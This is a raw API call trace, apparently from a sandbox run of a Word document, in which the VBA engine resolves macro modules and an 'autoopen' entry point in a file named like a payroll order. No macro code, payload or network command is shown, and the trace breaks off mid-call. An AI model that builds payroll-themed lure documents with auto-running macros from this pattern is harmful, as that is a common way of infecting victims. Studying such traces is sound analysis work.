_Destination=0x206f40, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0045.192] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0045.192] IMalloc:Alloc (This=0x7feff045380, cb=0x12a) returned 0x7f68600 [0045.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x7f68600, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0045.193] IMalloc:Free (This=0x7feff045380, pv=0x7f68600) [0045.193] wcscpy_s (in: _Destination=0x814db50, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0045.193] wcsncpy_s (in: _Destination=0x206f80, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0045.193] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0045.193] IMalloc:Alloc (This=0x7feff045380, cb=0x12a) returned 0x7f68600 [0045.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x7f68600, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0045.193] IMalloc:Free (This=0x7feff045380, pv=0x7f68600) [0045.193] wcsncpy_s (in: _Destination=0x206f40, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0045.193] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0045.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206e70, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0045.193] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0045.193] IUnknown:AddRef (This=0x7edffb0) returned 0x4 [0045.193] IUnknown:QueryInterface (in: This=0x7edffb0, riid=0x7fee40385a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207368 | out: ppvObject=0x207368*=0x0) returned 0x80004002 [0045.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x207330, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0045.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0045.193] IUnknown:Release (This=0x7edffb0) returned 0x3 [0045.193] IUnknown:Release (This=0x7edffb0) returned 0x2 [0045.194] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7dfea38, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0045.194] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7dfea38, cbMultiByte=7, lpWideCharStr=0x7e02308, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0045.194] IMalloc:Alloc (This=0x7feff045380, cb=0xa8) returned 0x8196570 [0045.194] IMalloc:Alloc (This=0x7feff045380, cb=0x7f40) returned 0x81d9f40 [0045.194] IMalloc:Alloc (This=0x7feff045380, cb=0x30) returned 0x7d55790 [0045.194] IMalloc:Alloc (This=0x7feff045380, cb=0x60) returned 0x80702e0 [0045.195] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x207658, pDummy=0x81f5c40 | out: ppTypeAttr=0x207658, pDummy=0x81f5c40*=0x202c0007) returned 0x0 [0045.195] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.195] IUnknown:Release (This=0x7f72450) returned 0x1 [0045.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Loi1", cchWideChar=5, lpMultiByteStr=0x2075e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Loi1", lpUsedDefaultChar=0x0) returned 5 [0045.202] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loi1") returned 0x10b1ab [0045.202] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Loi1") returned 0x10b1ab [0045.202] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x817bd50 [0045.202] qsort (in: _Base=0x817bd50, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fee3cc219c | out: _Base=0x817bd50) [0045.202] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="HHlau", cchCount1=-1, lpString2="Loi1", cchCount2=-1) returned 1 [0045.202] bsearch (_Key=0x206518, _Base=0x817bd50, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fee3cc219c) returned 0x817bd58 [0045.202] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Loi1", cchCount1=-1, lpString2="HHlau", cchCount2=-1) returned 3 [0045.202] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Loi1", cchCount1=-1, lpString2="Loi1", cchCount2=-1) returned 2 [0045.203] IUnknown:AddRef (This=0x7edf740) returned 0x4 [0045.203] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x2075f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x207301 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x207301*=0x0) returned 0x0 [0045.203] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="VBA", cchCount1=3, lpString2="Normal", cchCount2=6) returned 3 [0045.203] IUnknown:Release (This=0x7edf740) returned 0x3 [0045.203] IUnknown:AddRef (This=0x3dd7b80) returned 0x8 [0045.203] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x2075f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x207301 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x207301*=0x0) returned 0x0 [0045.203] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Word", cchCount1=4, lpString2="Normal", cchCount2=6) returned 3 [0045.203] IUnknown:Release (This=0x3dd7b80) returned 0x7 [0045.203] IUnknown:AddRef (This=0x7ee0550) returned 0x5 [0045.203] ITypeLib:RemoteGetDocumentation (in: This=0x7ee0550, index=-1, refPtrFlags=0x2075f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x207301 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x207301*=0x0) returned 0x0 [0045.203] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="stdole", cchCount1=6, lpString2="Normal", cchCount2=6) returned 3 [0045.203] IUnknown:Release (This=0x7ee0550) returned 0x4 [0045.203] wcscpy_s (in: _Destination=0x7dfea38, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0045.203] wcsncpy_s (in: _Destination=0x206f10, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0045.204] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0045.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206e40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0045.204] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0045.204] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7dfea38, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0045.204] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7dfea38, cbMultiByte=7, lpWideCharStr=0x7e02308, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0045.204] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Normal", cchCount1=6, lpString2="Normal", cchCount2=6) returned 2 [0045.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x207550, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.207] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207100 | out: ppvObject=0x207100*=0x0) returned 0x80004002 [0045.207] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070d0 | out: ppvObject=0x2070d0*=0x0) returned 0x80004002 [0045.207] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070c0 | out: ppvObject=0x2070c0*=0x0) returned 0x80004002 [0045.207] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070c8 | out: ppvObject=0x2070c8*=0x0) returned 0x80004002 [0045.207] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x2070f8, pDummy=0x10 | out: ppTypeAttr=0x2070f8, pDummy=0x10) returned 0x0 [0045.207] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.207] IUnknown:AddRef (This=0x7f72450) returned 0x3 [0045.207] IUnknown:Release (This=0x7f72450) returned 0x2 [0045.208] IMalloc:Realloc (This=0x7feff045380, pv=0x811be10, cb=0x100) returned 0x810a1a0 [0045.208] IMalloc:Free (This=0x7feff045380, pv=0x7d55490) [0045.209] SysStringByteLen (bstr="牕慢3") returned 0x5 [0045.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7dfea38, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0045.209] SysStringByteLen (bstr="牕慢3") returned 0x5 [0045.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7dfea38, cbMultiByte=6, lpWideCharStr=0x7e02308, cchWideChar=6 | out: lpWideCharStr="Urba3") returned 6 [0045.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Order_Payroll_81154032", cchWideChar=-1, lpMultiByteStr=0x25abd20, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Order_Payroll_81154032", lpUsedDefaultChar=0x0) returned 23 [0045.210] SysStringByteLen (bstr="牕慢3") returned 0x5 [0045.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7dfea38, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0045.210] SysStringByteLen (bstr="牕慢3") returned 0x5 [0045.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7dfea38, cbMultiByte=6, lpWideCharStr=0x7e02c68, cchWideChar=6 | out: lpWideCharStr="Urba3") returned 6 [0045.210] lstrlenA (lpString="Urba3") returned 5 [0045.210] lstrcatA (in: lpString1="Urba3", lpString2=" (" | out: lpString1="Urba3 (") returned="Urba3 (" [0045.210] strncat_s (in: _Destination="Urba3 (", _SizeInBytes=0x187, _Source="Order_Payroll_81154032", _MaxCount=0x28 | out: _Destination="Urba3 (Order_Payroll_81154032") returned 0x0 [0045.210] lstrcatA (in: lpString1="Urba3 (Order_Payroll_81154032", lpString2=")" | out: lpString1="Urba3 (Order_Payroll_81154032)") returned="Urba3 (Order_Payroll_81154032)" [0045.210] IMalloc:Alloc (This=0x7feff045380, cb=0xa8) returned 0x81966d0 [0045.210] IMalloc:Alloc (This=0x7feff045380, cb=0x30) returned 0x7d55490 [0045.210] IMalloc:Alloc (This=0x7feff045380, cb=0x60) returned 0x80703c0 [0045.211] IMalloc:Alloc (This=0x7feff045380, cb=0xa8) returned 0x8196780 [0045.211] IMalloc:Alloc (This=0x7feff045380, cb=0x30) returned 0x7d55650 [0045.211] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x2074e8, pDummy=0x81f5c40 | out: ppTypeAttr=0x2074e8, pDummy=0x81f5c40*=0x202c0007) returned 0x0 [0045.211] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.212] IUnknown:Release (This=0x7f72450) returned 0x2 [0045.212] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x207728, pDummy=0x815d260 | out: ppTypeAttr=0x207728, pDummy=0x815d260*=0x17) returned 0x0 [0045.212] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.212] IUnknown:Release (This=0x7f72450) returned 0x2 [0045.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HHlau", cchWideChar=6, lpMultiByteStr=0x207580, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HHlau", lpUsedDefaultChar=0x0) returned 6 [0045.212] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HHlau") returned 0x10b622 [0045.212] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="HHlau") returned 0x10b622 [0045.212] bsearch (_Key=0x2064b8, _Base=0x817bd50, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fee3cc219c) returned 0x817bd50 [0045.212] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="HHlau", cchCount1=-1, lpString2="HHlau", cchCount2=-1) returned 2 [0045.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Urba3.Loi1.autoopen", cchWideChar=-1, lpMultiByteStr=0x207880, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Urba3.Loi1.autoopen", lpUsedDefaultChar=0x0) returned 20 [0045.225] IMalloc:Alloc (This=0x7feff045380, cb=0x15) returned 0x817bbf0 [0045.225] strncpy_s (in: _Dst=0x817bbf0, _DstSize=0x15, _Src="Urba3.Loi1.autoopen", _MaxCount=0x13 | out: _Dst="Urba3.Loi1.autoopen") returned 0x0 [0045.225] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Urba3") returned 0x10a220 [0045.225] bsearch (_Key=0x206798, _Base=0x817bd50, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fee3cc219c) returned 0x0 [0045.225] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Urba3", cchCount1=-1, lpString2="HHlau", cchCount2=-1) returned 3 [0045.225] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Urba3", cchCount1=-1, lpString2="Loi1", cchCount2=-1) returned 3 [0045.225] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Urba3", cchCount1=-1, lpString2="Urba3", cchCount2=-1) returned 2 [0045.225] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Loi1") returned 0x10b1ab [0045.225] bsearch (_Key=0x206798, _Base=0x817bd50, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fee3cc219c) returned 0x817bd58 [0045.225] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Loi1", cchCount1=-1, lpString2="HHlau", cchCount2=-1) returned 3 [0045.226] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Loi1", cchCount1=-1, lpString2="Loi1", cchCount2=-1) returned 2 [0045.226] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="autoopen") returned 0x102ad9 [0045.227] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188280 [0045.227] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x81883c0 [0045.227] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2063f0 | out: ppvObject=0x2063f0*=0x0) returned 0x80004002 [0045.227] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x206338 | out: ppvObject=0x206338*=0x7f722f0) returned 0x0 [0045.227] ITypeInfo2:GetCustData (in: This=0x7f722f0, GUID=0x7fee403d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x206348 | out: pVarVal=0x206348*(varType=0x0, wReserved1=0x20, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0045.227] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.227] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x206340, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x206360 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x206360*="") returned 0x0 [0045.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x206250, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0045.228] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x206340, pDummy=0x0 | out: ppTypeAttr=0x206340, pDummy=0x0) returned 0x0 [0045.228] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x0, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x10, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x11, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x12, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.228] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x13, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x14, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x15, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x16, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x17, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] 